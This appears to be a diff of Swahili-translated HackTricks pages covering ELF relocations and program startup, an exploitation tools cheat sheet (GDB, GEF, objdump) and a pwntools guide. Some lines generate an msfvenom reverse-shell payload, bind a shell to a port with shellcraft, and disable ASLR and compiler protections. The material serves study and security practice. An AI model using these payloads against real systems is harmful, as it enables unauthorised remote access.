00000001fee0 001500000402 R_AARCH64_JUMP_SL 0000000000000000 gettimeofday@GLIBC_2.17 + 0
00000001fee8 001600000402 R_AARCH64_JUMP_SL 0000000000000000 sleep@GLIBC_2.17 + 0
00000001fef0 001700000402 R_AARCH64_JUMP_SL 0000000000000000 __vfprintf_chk@GLIBC_2.17 + 0
00000001fef8 001800000402 R_AARCH64_JUMP_SL 0000000000000000 calloc@GLIBC_2.17 + 0
00000001ff00 001900000402 R_AARCH64_JUMP_SL 0000000000000000 rewind@GLIBC_2.17 + 0
00000001ff08 001a00000402 R_AARCH64_JUMP_SL 0000000000000000 strdup@GLIBC_2.17 + 0
00000001ff10 001b00000402 R_AARCH64_JUMP_SL 0000000000000000 closedir@GLIBC_2.17 + 0
00000001ff18 001c00000402 R_AARCH64_JUMP_SL 0000000000000000 __stack_chk_fail@GLIBC_2.17 + 0
00000001ff20 001d00000402 R_AARCH64_JUMP_SL 0000000000000000 strrchr@GLIBC_2.17 + 0
00000001ff28 001e00000402 R_AARCH64_JUMP_SL 0000000000000000 __gmon_start__ + 0
00000001ff30 002000000402 R_AARCH64_JUMP_SL 0000000000000000 abort@GLIBC_2.17 + 0
00000001ff38 002100000402 R_AARCH64_JUMP_SL 0000000000000000 feof@GLIBC_2.17 + 0
00000001ff40 002200000402 R_AARCH64_JUMP_SL 0000000000000000 getopt_long@GLIBC_2.17 + 0
00000001ff48 002300000402 R_AARCH64_JUMP_SL 0000000000000000 __fprintf_chk@GLIBC_2.17 + 0
00000001ff50 002400000402 R_AARCH64_JUMP_SL 0000000000000000 strcmp@GLIBC_2.17 + 0
00000001ff58 002500000402 R_AARCH64_JUMP_SL 0000000000000000 free@GLIBC_2.17 + 0
00000001ff60 002600000402 R_AARCH64_JUMP_SL 0000000000000000 readdir64@GLIBC_2.17 + 0
00000001ff68 002700000402 R_AARCH64_JUMP_SL 0000000000000000 strndup@GLIBC_2.17 + 0
00000001ff70 002800000402 R_AARCH64_JUMP_SL 0000000000000000 strchr@GLIBC_2.17 + 0
00000001ff78 002900000402 R_AARCH64_JUMP_SL 0000000000000000 fwrite@GLIBC_2.17 + 0
```plaintext
00000001ff80 002a00000402 R_AARCH64_JUMP_SL 0000000000000000 fflush@GLIBC_2.17 + 0
00000001ff88 002b00000402 R_AARCH64_JUMP_SL 0000000000000000 fopen64@GLIBC_2.17 + 0
00000001ff90 002c00000402 R_AARCH64_JUMP_SL 0000000000000000 __isoc99_sscanf@GLIBC_2.17 + 0
00000001ff98 002d00000402 R_AARCH64_JUMP_SL 0000000000000000 strncpy@GLIBC_2.17 + 0
00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0
00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
```
### Marekebisho ya Stati
Ikiwa **programu imepakia mahali tofauti** na anwani inayopendelewa (kawaida 0x400000) kwa sababu anwani tayari inatumika au kwa sababu ya **ASLR** au sababu nyingine yoyote, marekebisho ya stati **hurekebisha pointa** ambazo zilikuwa na thamani zikiatarajia binary ipakuliwe katika anwani inayopendelewa.
Kwa mfano, sehemu yoyote ya aina `R_AARCH64_RELATIV` inapaswa kurekebisha anwani kwenye upendeleo wa marekebisho pamoja na thamani ya kuongeza.
### Marekebisho ya Kudumu na GOT
Marekebisho yanaweza pia kurejelea alama ya nje (kama kazi kutoka kwa tegemeo). Kama vile kazi ya malloc kutoka libC. Kisha, mzigo unapopakia libC katika anwani ikichunguza wapi kazi ya malloc imepakuliwa, itaandika anwani hii katika jedwali la GOT (Global Offset Table) (inayoonyeshwa katika jedwali la marekebisho) ambapo anwani ya malloc inapaswa kutajwa.
### Jedwali la Uunganishaji wa Taratibu
Sehemu ya PLT inaruhusu kufanya uunganishaji wa uvivu, ambao maana yake ni kwamba kutatuliwa kwa eneo la kazi kutafanywa mara ya kwanza inapofikiwa.
Kwa hivyo wakati programu inaita malloc, kimsingi inaita eneo linalofanana la `malloc` katika PLT (`malloc@plt`). Mara ya kwanza inaitwa, inatatua anwani ya `malloc` na kuichukua ili wakati `malloc` inaitwa tena, anwani hiyo itatumika badala ya msimbo wa PLT.
## Uanzishaji wa Programu
Baada ya programu kupakia ni wakati wake wa kukimbia. Walakini, msimbo wa kwanza unaorushwa **si mara zote ni `main`**. Hii ni kwa sababu kwa mfano katika C++ ikiwa **kigezo cha kawaida ni kitu cha darasa**, kipengee hiki lazima kihifadhiwe **kabla** ya `main` kukimbia, kama vile:
```cpp
#include <stdio.h>
// g++ autoinit.cpp -o autoinit
class AutoInit {
public:
AutoInit() {
printf("Hello AutoInit!\n");
}
~AutoInit() {
printf("Goodbye AutoInit!\n");
}
};
AutoInit autoInit;
int main() {
printf("Main\n");
return 0;
}
```
Tafadhali elewa kwamba hizi variables za kimataifa zinapatikana katika `.data` au `.bss` lakini katika orodha `__CTOR_LIST__` na `__DTOR_LIST__` vitu vya kuanzisha na kuharibu vimehifadhiwa kwa mpangilio ili kufuatilia.
Kutoka kwa nambari ya C ni rahisi kupata matokeo sawa kwa kutumia vifaa vya GNU:
```c
__attributte__((constructor)) //Add a constructor to execute before
__attributte__((destructor)) //Add to the destructor list
```
Kutoka kwa mtazamo wa compiler, ili kutekeleza hatua hizi kabla na baada ya kazi ya `main` kutekelezwa, ni rahisi kuunda kazi ya `init` na kazi ya `fini` ambazo zitatajwa katika sehemu ya kudumu kama **`INIT`** na **`FIN`** na kuwekwa katika sehemu za `init` na `fini` za ELF.
Chaguo lingine, kama ilivyotajwa, ni kutaja orodha **`__CTOR_LIST__`** na **`__DTOR_LIST__`** katika viingilio vya **`INIT_ARRAY`** na **`FINI_ARRAY`** katika sehemu ya kudumu na urefu wa hizi unatajwa na **`INIT_ARRAYSZ`** na **`FINI_ARRAYSZ`**. Kila kuingilio ni kidude cha kazi ambacho kitaitwa bila hoja.
Zaidi ya hayo, ni rahisi pia kuwa na **`PREINIT_ARRAY`** na **pointers** ambazo zitatekelezwa **kabla** ya kidude cha **`INIT_ARRAY`**.
### Mpangilio wa Uanzishaji
1. Programu inapakiwa kumbukani, vitu vya kudumu vya kimataifa vinainishwa katika **`.data`** na vile visivyoainishwa vinawekwa sifuri katika **`.bss`**.
2. **Mahitaji yote** kwa programu au maktaba zina **inaishwa** na **uunganishaji wa kudumu** unatekelezwa.
3. Kazi za **`PREINIT_ARRAY`** zinatekelezwa.
4. Kazi za **`INIT_ARRAY`** zinatekelezwa.
5. Ikiwa kuna kuingilio la **`INIT`** linaitwa.
6. Ikiwa ni maktaba, dlopen inamalizika hapa, ikiwa ni programu, ni wakati wa kuita **sehemu ya kuingia halisi** (`main` function).
## Uhifadhi wa Wateja wa Wateja (TLS)
Hizi zinatajwa kwa kutumia neno **`__thread_local`** katika C++ au kifupisho cha GNU **`__thread`**.
Kila wateja atahifadhi eneo la kipekee kwa hii kidude hivyo ni wateja pekee wanaweza kupata kidude chao.
Inapotumiwa, sehemu **`.tdata`** na **`.tbss`** hutumiwa katika ELF. Ambazo ni kama `.data` (inaanzishwa) na `.bss` (haikoanzishwa) lakini kwa TLS.
Kila kidude kitakuwa na kuingilio katika kichwa cha TLS kinachotaja ukubwa na kielekezo cha TLS, ambacho ni kielekezo kitatumika katika eneo la data la wateja wa wateja.
`__TLS_MODULE_BASE` ni ishara inayotumika kutaja anwani ya msingi ya uhifadhi wa wateja wa wateja na inaelekeza eneo kumbukumbu linalo jumuisha data yote ya wateja wa wateja wa moduli.

249
binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md Normal file
View file

@ -0,0 +1,249 @@
# Zana za Kudukua
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Metasploit
```bash
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
### Shellcodes
{% code overflow="wrap" %}
```bash
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
{% endcode %}
## GDB
### Sakinisha
```bash
apt-get install gdb
```
### Vigezo
```bash
-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process
```
### Maelekezo
```bash
run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit
# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process
# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes
# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate
# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP
```
### [GEF](https://github.com/hugsy/gef)
Unaweza hiari kutumia [**hii fork ya GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) ambayo ina maelekezo zaidi ya kuvutia.
```bash
help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table
# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Dump memory to file
dump binary memory /tmp/dump.bin 0x200000000 0x20000c350
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
```
### Mbinu
#### Anwani sawa za GDB
Wakati wa kudebugi GDB itakuwa na **anwani kidogo tofauti na zile zinazotumiwa na binary inapotekelezwa.** Unaweza kufanya GDB iwe na anwani sawa kwa kufuata hatua hizi:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Weka njia kamili ya binary_
* Tumia mbinu ya kudukua binary kwa kutumia njia kamili
* `PWD` na `OLDPWD` lazima ziwe sawa unapotumia GDB na unapodukua binary
#### Kufuatilia nyuma ili kupata kazi zilizoitwa
Ukiwa na **binary iliyolinkwa kwa njia ya static** kazi zote zitakuwa sehemu ya binary (na sio maktaba za nje). Katika kesi hii itakuwa ngumu **kutambua mwendelezo ambao binary inafuata kwa mfano kuomba mwingiliano wa mtumiaji**.\
Unaweza kutambua mwendelezo huu kwa urahisi kwa **kutekeleza** binary na **gdb** hadi utakapoombwa mwingiliano. Kisha, isimamishe kwa kubonyeza **CTRL+C** na tumia amri ya **`bt`** (**backtrace**) kuona kazi zilizoitwa:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### Server ya GDB
`gdbserver --multi 0.0.0.0:23947` (katika IDA unahitaji kujaza njia kamili ya faili ya kutekelezwa kwenye mashine ya Linux na kwenye mashine ya Windows)
## Ghidra
### Pata offset ya stack
**Ghidra** ni muhimu sana kwa kupata **offset** kwa **kuzidi kwa buffer kutokana na habari kuhusu nafasi ya variables za ndani.**\
Kwa mfano, katika mfano hapa chini, kuzidi kwa buffer katika `local_bc` inaonyesha kwamba unahitaji offset ya `0xbc`. Zaidi ya hayo, ikiwa `local_10` ni kuki ya canary inaonyesha kwamba kuiandika upya kutoka `local_bc` kuna offset ya `0xac`.\
_Kumbuka kwamba 0x08 ya kwanza ambapo RIP inahifadhiwa inahusiana na RBP._
![](<../../../.gitbook/assets/image (1061).png>)
## qtool
```bash
qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog
```
Pata kila opcode inayotekelezwa katika programu.
## GCC
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kupachika bila ulinzi\
**-o** --> Matokeo\
**-g** --> Hifadhi kanuni (GDB itaweza kuiona)\
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> Kulegeza ASLR katika linux
**Kupachika shellcode:**\
**nasm -f elf assembly.asm** --> rudi ".o"\
**ld assembly.o -o shellcodeout** --> Inatekelezeka
## Objdump
**-d** --> **Disassemble sehemu** za inatekelezeka (angalia opcodes ya shellcode iliyopachikwa, pata ROP Gadgets, pata anwani ya kazi...)\
**-Mintel** --> Sintaksia ya **Intel**\
**-t** --> Jedwali la **Alama**\
**-D** --> **Disassemble zote** (anwani ya kipengee tuli)\
**-s -j .dtors** --> sehemu ya dtors\
**-s -j .got** --> sehemu ya got\
\-D -s -j .plt --> sehemu ya **plt** **iliyopachikwa**\
**-TR** --> **Uhamishaji**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> Anwani ya "puts" ya kurekebisha katika GOT\
**objdump -D ./exec | grep "VAR\_NAME"** --> Anwani au kipengee tuli (hizi hifadhiwa katika sehemu ya DATA).
## Core dumps
1. Tekeleza `ulimit -c unlimited` kabla ya kuanza programu yangu
2. Tekeleza `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. sudo gdb --core=\<path/core> --quiet
## Zaidi
**ldd executable | grep libc.so.6** --> Anwani (ikiwa na ASLR, basi hii hubadilika kila wakati)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Mzunguko wa kuona ikiwa anwani inabadilika sana\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Kielezo cha "system"\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Kielezo cha "/bin/sh"
**strace executable** --> Kazi zilizoitwa na inatekelezeka\
**rabin2 -i ejecutable -->** Anwani ya kila kazi
## **Inmunity debugger**
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
## IDA
### Kudebugi kwa mbali kwenye linux
Ndani ya folda ya IDA unaweza kupata binaries ambazo zinaweza kutumika kudebugi binary kwenye linux. Ili kufanya hivyo hamisha binary `linux_server` au `linux_server64` ndani ya server ya linux na iendeshe ndani ya folda inayohifadhi binary hiyo:
```
./linux_server64 -Ppass
```
Kisha, sanidi kielekezi cha kurekebisha makosa: Kielekezi (mbali ya linux) --> Chaguo la Mchakato...:
![](<../../../.gitbook/assets/image (858).png>)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

172
binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md Normal file
View file

@ -0,0 +1,172 @@
# PwnTools
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
```
pip3 install pwntools
```
## Pwn asm
Pata **opcodes** kutoka kwenye mstari au faili.
```
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**Inaweza kuchagua:**
* aina ya matokeo (raw, hex, string, elf)
* muktadha wa faili ya matokeo (16, 32, 64, linux, windows...)
* epuka herufi (mistari mipya, null, orodha)
* chagua kifaa cha kuhariri kificho cha kutumia gdb kukimbia matokeo
## **Pwn checksec**
Skripti ya Checksec
```
pwn checksec <executable>
```
## Pwn constgrep
## Pwn cyclic
Pata mfano
```
pwn cyclic 3000
pwn cyclic -l faad
```
**Inaweza kuchagua:**
* Alfabeti iliyotumiwa (herufi ndogo kwa kawaida)
* Urefu wa mfano wa kipekee (kawaida 4)
* muktadha (16,32,64,linux,windows...)
* Chukua mbali (-l)
## Pwn debug
Ambatisha GDB kwa mchakato
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**Inaweza kuchagua:**
* Kwa kutekelezeka, kwa jina au kwa muktadha wa pid (16,32,64,linux,windows...)
* gdbscript ya kutekeleza
* njia ya sysroot
## Pwn disablenx
Zima nx ya binary
```
pwn disablenx <filepath>
```
## Pwn disasm
Kuchambua nambari za hex opcodes
```
pwn disasm ffe4
```
**Inaweza kuchagua:**
* muktadha (16,32,64,linux,windows...)
* anwani ya msingi
* rangi (chaguo-msingi)/bila rangi
## Pwn elfdiff
Chapisha tofauti kati ya faili 2
```
pwn elfdiff <file1> <file2>
```
## Pwn hex
Pata uwakilishi wa hexadecimal
```bash
pwn hex hola #Get hex of "hola" ascii
```
## Pwn shahada
Pata dumpu ya hex
```
pwn phd <file>
```
**Inaweza kuchagua:**
* Idadi ya baits za kuonyesha
* Idadi ya baits kwa kila mstari kuonyesha bait
* Kuruka baits mwanzoni
## Pwn pwnstrip
## Pwn scrable
## Pwn shellcraft
Pata shellcodes
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**Inaweza kuchagua:**
* shellcode na hoja za shellcode
* Faili ya pato
* muundo wa pato
* debug (ambatanisha dbg na shellcode)
* kabla (kizuizi cha debug kabla ya nambari)
* baada ya
* epuka kutumia opcodes (chaguo-msingi: sio null na mstari mpya)
* Tekeleza shellcode
* Rangi/bila rangi
* orodha syscalls
* orodha ya shellcodes inayowezekana
* Zalisha ELF kama maktaba iliyoshirikiwa
## Kigezo cha Pwn
Pata kigezo cha python
```
pwn template
```
**Inaweza kuchagua:** mwenyeji, bandari, mtumiaji, nenosiri, njia na kimya
## Pwn unhex
Kutoka hex hadi string
```
pwn unhex 686f6c61
```
## Sasisha Pwn
Ili kusasisha pwntools
```
pwn update
```
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

74
generic-methodologies-and-resources/pentesting-methodology.md
View file

@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
@ -14,7 +14,7 @@ Njia nyingine za kusaidia HackTricks:
</details>
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Ikiwa una nia ya **kazi ya udukuzi** na kudukua yasiyodukuzika - **tunakupa kazi!** (_inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha_).
@ -32,43 +32,43 @@ Je! Una **upatikanaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa k
### 1 - [Kugundua mwenyeji ndani ya mtandao](pentesting-network/#discovering-hosts)/ [Kugundua Mali za kampuni](external-recon-methodology/)
**Kulingana** na **jaribio** unalofanya ikiwa ni **jaribio la ndani au nje** unaweza kuwa unavutiwa na kutafuta **wenyeji ndani ya mtandao wa kampuni** (jaribio la ndani) au **kutafuta mali za kampuni kwenye mtandao** (jaribio la nje).
**Kulingana** na **jaribio** unalofanya ni **jaribio la ndani au nje** unaweza kuwa na hamu ya kupata **wenyeji ndani ya mtandao wa kampuni** (jaribio la ndani) au **kugundua mali za kampuni kwenye mtandao** (jaribio la nje).
{% hint style="info" %}
Tafadhali kumbuka kuwa ikiwa unafanya jaribio la nje, mara tu unapofanikiwa kupata ufikiaji wa mtandao wa ndani wa kampuni unapaswa kuanza tena mwongozo huu.
Tafadhali kumbuka kuwa ikiwa unafanya jaribio la nje, mara tu unapofanikiwa kupata ufikiaji wa mtandao wa ndani wa kampuni unapaswa kuanza mwongozo huu upya.
{% endhint %}
### **2-** [**Kufurahia na mtandao**](pentesting-network/) **(Ndani)**
**Sehemu hii inatumika tu ikiwa unafanya jaribio la ndani.**\
Kabla ya kushambulia mwenyeji labda ungependa **kuiba baadhi ya vibali** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** kujifunza **kimya/kwa shughuli (MitM)** unaweza kupata nini ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing).
Kabla ya kushambulia mwenyeji labda ungependa **kuiba baadhi ya vibali** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** kujifunza **kimya/kwa vitendo (MitM)** unaweza kupata nini ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing).
### 3- [Uchunguzi wa Bandari - Kugundua Huduma](pentesting-network/#scanning-hosts)
Jambo la kwanza kufanya unapotafuta **mapungufu kwenye mwenyeji** ni kujua ni **huduma zipi zinazoendeshwa** kwenye bandari zipi. Hebu tuone [**zana za msingi za kutafuta bandari za wenyeji**](pentesting-network/#scanning-hosts).
Jambo la kwanza kufanya unapotafuta **mapungufu kwenye mwenyeji** ni kujua ni **huduma zipi zinazoendeshwa** kwenye bandari zipi. Hebu tuone [**zana za msingi za kutambua bandari za wenyeji**](pentesting-network/#scanning-hosts).
### **4-** [Kutafuta udhaifu wa toleo la huduma](search-exploits.md)
Marafiki unapojua ni huduma zipi zinazoendeshwa, na labda toleo lao, unapaswa **kutafuta udhaifu uliojulikana**. Labda utapata bahati na kuna shambulio la kukupa kifaa cha kudhibiti...
Marafiki unapojua ni huduma zipi zinazoendeshwa, na labda toleo lao, unapaswa **kutafuta udhaifu uliojulikana**. Labda utakuwa na bahati na kutakuwa na shambulio la kukupa kifaa cha kudhibiti...
### **5-** Huduma za Pentesting
Ikiwa hakuna shambulio la kipekee kwa huduma yoyote inayoendeshwa, unapaswa kutafuta **mipangilio ya kawaida isiyofaa katika kila huduma inayoendeshwa.**
Ikiwa hakuna shambulio la kipekee kwa huduma yoyote inayoendeshwa, unapaswa kutafuta **kosa la kawaida katika kila huduma inayoendeshwa.**
**Ndani ya kitabu hiki utapata mwongozo wa kufanya udukuzi wa huduma za kawaida** (na zingine ambazo si za kawaida)**. Tafadhali, tafuta kwenye index ya kushoto** _**PENTESTING**_ **sehemu** (huduma zimepangwa kulingana na bandari zao za msingi).
**Ndani ya kitabu hiki utapata mwongozo wa kudukua huduma za kawaida** (na zingine ambazo si za kawaida)**. Tafadhali, tafuta kwenye index ya kushoto** _**PENTESTING**_ **sehemu** (huduma zimepangwa kulingana na bandari zao za msingi).
**Nataka kufanya kumbukumbu maalum ya** [**Sehemu ya Pentesting ya Wavuti**](../network-services-pentesting/pentesting-web/) **(kwani ndio ndefu zaidi).**\
**Nataka kufanya kumbukumbu maalum ya** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **sehemu (kwani ni pana zaidi).**\
Pia, mwongozo mdogo juu ya jinsi ya [**kupata udhaifu uliojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa.
**Ikiwa huduma yako haipo kwenye index, tafuta kwenye Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **hupati chochote** kwenye Google, fanya **udukuzi wako wa upofu**, unaweza kuanza kwa **kuunganisha kwenye huduma, kufanya fujo na kusoma majibu** (ikiwa yapo).
